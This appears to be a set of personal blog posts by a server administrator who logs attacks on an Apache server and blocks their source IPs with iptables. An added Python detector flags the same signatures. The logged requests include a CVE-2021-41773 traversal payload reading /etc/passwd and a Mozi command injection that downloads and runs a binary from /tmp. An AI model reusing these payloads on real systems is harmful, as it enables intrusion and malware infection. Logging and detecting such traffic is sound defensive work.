Apache security flaw « /cgi-bin/.%2e » (CVE-2021-41773)

I was able to observe two different attacks:

167.71.13.196 - - [15/Oct/2021:01:11:24 +0200] "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts HTTP/1.1" 400 5636 "-" "Lkx-Apache2449TraversalPlugin/0.0.1 (+https://leakix.net/, +https://twitter.com/HaboubiAnis)"
45.93.201.33 - - [15/Oct/2021:08:16:57 +0200] "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 400 485 "-" "-"

So I blocked the IPs:

# iptables -A INPUT -s 167.71.13.196 -j DROP
# iptables -A INPUT -s 45.93.201.33 -j DROP
# /usr/sbin/iptables-save > /etc/iptables/rules.v4

For information, the IPs in question:

167.71.13.196
  Country / Region / City: Netherlands / Noord-Holland / Amsterdam
  ISP / Organization: DigitalOcean LLC / Not Available
  Latitude / Longitude: 52.3740 / 4.8897

45.93.201.33
  Country / Region / City: Russian Federation / Moskva / Moscow
  ISP / Organization: LIR LLC / Not Available
  Latitude / Longitude: 55.7522 / 37.6156

To be continued.

Which countries do the IPs in my /etc/iptables/rules.v4 file come from?

I updated my previous article: https://www.cyber-neurones.org/2021/06/quels-sont-les-pays-des-ip-de-mon-fichier-etc-iptables-rules-v4/.

Here is the command and its result:

#  cat /etc/iptables/rules.v4 | grep "DROP" | awk '{print $4}' | sed 's/\// /g' | awk '{print $1}' | xargs -n 1 geoiplookup { } | sort | uniq -c | sort -n | sed -r 's/ GeoIP Country Edition://g'
      1 AL, Albania
      1 AT, Austria
      1 CZ, Czech Republic
      1 GR, Greece
      1 IE, Ireland
      1 MD, Moldova, Republic of
      1 PE, Peru
      1 PH, Philippines
      1 SE, Sweden
      1 TT, Trinidad and Tobago
      1 UG, Uganda
      2 ID, Indonesia
      2 IR, Iran, Islamic Republic of
      2 IT, Italy
      2 JP, Japan
      2 MX, Mexico
      2 MY, Malaysia
      2 SG, Singapore
      2 TR, Turkey
      2 TW, Taiwan
      3 VN, Vietnam
      4 BR, Brazil
      4 EG, Egypt
      4 SC, Seychelles
      5 DE, Germany
      5 FR, France
      5 GB, United Kingdom
      6 CA, Canada
      6 KR, Korea, Republic of
      7 NL, Netherlands
      7 RU, Russian Federation
     11 IN, India
     19 IP Address not found
     43 CN, China
    107 US, United States

Still the US in front with 107 IPs … in the end the Russians, with 7 IPs, are small fry.

Misery.


Security flaw: malware nicknamed « THE MOON » on Linksys.

Here is an example of a trace on my server:

50.31.21.6 - - [14/Oct/2021:02:02:15 +0200] "GET / HTTP/1.0" 302 5156 "-" "-"
50.31.21.6 - - [14/Oct/2021:02:02:48 +0200] "HEAD / HTTP/1.1" 302 4938 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; MDDCJS; rv:11.0) like Gecko"
50.31.21.6 - - [14/Oct/2021:02:02:48 +0200] "GET /nmaplowercheck1634169768 HTTP/1.1" 302 5145 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; MDDCJS; rv:11.0) like Gecko"
50.31.21.6 - - [14/Oct/2021:02:02:48 +0200] "POST /sdk HTTP/1.1" 302 4957 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; MDDCJS; rv:11.0) like Gecko"
50.31.21.6 - - [14/Oct/2021:02:02:48 +0200] "GET / HTTP/1.0" 302 5156 "-" "-"
50.31.21.6 - - [14/Oct/2021:02:02:49 +0200] "GET /HNAP1 HTTP/1.1" 302 5145 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; MDDCJS; rv:11.0) like Gecko"
50.31.21.6 - - [14/Oct/2021:02:02:49 +0200] "GET / HTTP/1.1" 302 5126 "-" "-"
50.31.21.6 - - [14/Oct/2021:02:02:49 +0200] "HEAD /user/auth/login HTTP/1.1" 200 6095 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; MDDCJS; rv:11.0) like Gecko"
50.31.21.6 - - [14/Oct/2021:02:02:49 +0200] "GET /evox/about HTTP/1.1" 302 5145 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; MDDCJS; rv:11.0) like Gecko"
50.31.21.6 - - [14/Oct/2021:02:02:49 +0200] "GET /user/auth/login HTTP/1.1" 200 29756 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; MDDCJS; rv:11.0) like Gecko"

The signature is above all: « GET /HNAP1 HTTP/1.1 »

My action:

# iptables -A INPUT -s 50.31.21.6 -j DROP
# /usr/sbin/iptables-save > /etc/iptables/rules.v4

More information on the IP:

50.31.21.6
  Country / Region / City: United States of America / Illinois / Chicago
  ISP / Organization: SteadFast / Not Available
  Latitude / Longitude: 41.8761 / -87.6521

Note that this is clearly not the first attack of this kind:

134.255.233.173 - - [13/Oct/2021:18:55:13 +0200] "POST /HNAP1/ HTTP/1.1" 302 255 "-" "Mozila/5.0"
192.168.1.153 - - [13/Oct/2021:21:25:40 +0200] "GET /HNAP1/ HTTP/1.1" 302 404 "-" "Avast Antivirus"
112.27.124.140 - - [30/Oct/2020:22:40:00 +0100] "POST /HNAP1/ HTTP/1.0" 408 484 "-" "-"
45.6.195.248 - - [31/Oct/2020:00:23:21 +0100] "POST /HNAP1/ HTTP/1.0" 408 484 "-" "-"

Misery.

Security flaw on « wget » via http?

I saw this in my logs:

125.43.243.4 - - [14/Oct/2021:12:53:13 +0200] "27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0" 400 0 "-" "-"

So I filtered the IP:

# iptables -A INPUT -s 125.43.243.4 -j DROP
# /usr/sbin/iptables-save > /etc/iptables/rules.v4

Misery.

125.43.243.4
  Country / Region / City: China / Henan / Jiaozuo
  ISP / Organization: China Unicom Henan Province Network / Not Available
  Latitude / Longitude: 35.2397 / 113.2331
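The three posts above each spot one request signature by eye (the /cgi-bin/.%2e traversal, the /HNAP1 probe, the wget download-and-run line) and then add an iptables DROP rule by hand. Here is an added Python example, not code from the blog, that does the same over Apache combined-format log lines: it percent-decodes the request path so the `.%2e` trick reads as `..`, checks whether the path escapes /cgi-bin, matches the other two signatures, and prints the corresponding DROP rules. The sample lines are constructed with documentation-range IPs; the signature names and the assumption of the default "combined" LogFormat are mine.

```python
import posixpath
import re
from urllib.parse import unquote

# Apache combined-log regex (constructed here; assumes the default "combined" LogFormat).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)
METHODS = {"GET", "HEAD", "POST", "PUT", "DELETE", "OPTIONS"}

def classify(request):
    """Name the signature a request line matches, or return None."""
    parts = request.split(" ")
    # Only a well-formed "METHOD /path HTTP/x" yields a path; decode it first,
    # since ".%2e" is what lets the traversal past a literal ".." check.
    path = unquote(parts[1]) if len(parts) == 3 and parts[0] in METHODS else ""
    if path.startswith("/cgi-bin/") and not posixpath.normpath(path).startswith("/cgi-bin/"):
        return "cgi-bin-traversal"        # /cgi-bin/.%2e/%2e%2e/... resolves outside cgi-bin
    if path.split("?", 1)[0].rstrip("/") == "/HNAP1":
        return "hnap1-probe"              # the "The Moon" / HNAP scanner signature
    decoded = unquote(request)            # the wget line is not even a valid request
    if "wget " in decoded and "/tmp/" in decoded:
        return "wget-dropper"             # download-and-execute one-liner (Mozi-style)
    return None

def scan(lines):
    """Map each offending source IP to the set of signatures it triggered."""
    hits = {}
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue
        sig = classify(m.group("req"))
        if sig:
            hits.setdefault(m.group("ip"), set()).add(sig)
    return hits

def iptables_rules(hits):
    """Render the DROP rules the posts add by hand, one per offending IP."""
    return [f"iptables -A INPUT -s {ip} -j DROP" for ip in sorted(hits)]

# Constructed sample lines using documentation-range IPs (not the blog's real log).
SAMPLE_LOG = [
    '198.51.100.7 - - [15/Oct/2021:01:11:24 +0200] "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 400 485 "-" "-"',
    '198.51.100.8 - - [14/Oct/2021:02:02:49 +0200] "GET /HNAP1 HTTP/1.1" 302 5145 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [14/Oct/2021:12:53:13 +0200] "27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0" 400 0 "-" "-"',
    '203.0.113.5 - - [14/Oct/2021:02:02:49 +0200] "GET /cgi-bin/app/../index.cgi HTTP/1.1" 200 1234 "-" "curl/7.68.0"',
]

if __name__ == "__main__":
    for rule in iptables_rules(scan(SAMPLE_LOG)):
        print(rule)
```

The last sample line stays inside /cgi-bin after normalisation and is deliberately not flagged, which is the distinction a literal ".." match would miss.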